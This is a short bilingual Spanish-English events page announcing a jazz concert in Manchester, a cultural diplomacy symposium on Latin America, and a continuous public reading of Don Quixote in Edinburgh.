Este concierto, se celebró con una mangnífica acústica en la Iglesia de Sant Ann’s, donde Antonio Srrano hizo resaltar el talante emotivo de su repertorio, el cual nos evocó a Bach, Chopin, Piazzola o Charlie Parker.

Su debut en el Reino Unido supuso que fuera un concierto mágico y uno de los principales de este festival de Jazz que se cxelebra cada año en Mánchester

Los países de América Latina pueden presumir de tener una amplia y variada diversidad cultural y orígenes étnicos. La colonización ibérica de una gran parte del continente sudamericano en el siglo XVI provocó la introducción de la cultura y religión tanto francesa, española como portuguesa en el continente. Esta fusión ha permitido el desarrollo de uno de los ejemplos más claros de mezcolanza cultural existentes hoy en día. Es por ello que el Institute for Cultural Diplomacy ha desarrollado el Simposio Internacional en Diplomacia Cultural en América Latina con el objetivo de presentar al mundo una original perspectiva de América Latina y su legado único y explorará el potencial de su arte y cultural para apoyar su desarrollo regional.

The countries of Latin America play host to a diverse range of cultural and ethnic backgrounds. The Iberian colonization of large parts of the South American continent in the 16th century led to the introduction of French, Spanish, and Portuguese culture in the region, and this mélange, (strengthened even further by the cultural remnants of pre-Columbian civilizations, the influx of European immigrants in the 19th and 20th centuries, and the introduction of Africans to the continent), has led to the development of one of the most clear-cut examples of a cultural melting pot in current existence. El Mundo a través de los ojos de Don Quijote

La temática de esta edición del Mental Health Film and Arts Festival es “Realidad y ficción” e incluye en su programa la lectura continuada del Quijote, obra que se ajusta a la perfección con la temática propuesta. Es una de las iniciativas culturales que CQTC Group está llevando a cabo en Escocia por la concienciación con los problemas de salud mental.
Este evento tendrá lugar en Edimburgo, en la sala de conferencias de la Biblioteca Central el 18 de octubre.Durante las seis horas de lectura ininterrumpida los participantes tendrán un animado foro de participación y serán no solo receptores sino también la voz del famoso texto de Miguel de Cervantes.

The World through Don Quixote’s eyes

The continuous reading of Don Quixote is conceived as a part of the cultural initiatives that CQTC Group is developing in Scotland. This year the festival is conceived around the topic “Reality” and the main character of this novel fits perfectly “The World through Don Quixote’s eyes”.

During six hours of non-stop reading, the participants will have a lively forum of participation and the opportunity to become not only recipients but also, the voice of the famous text of Miguel de Cervantes 

This event will take place in Edinburgh, in the conference room of the Central Library on 18th October.
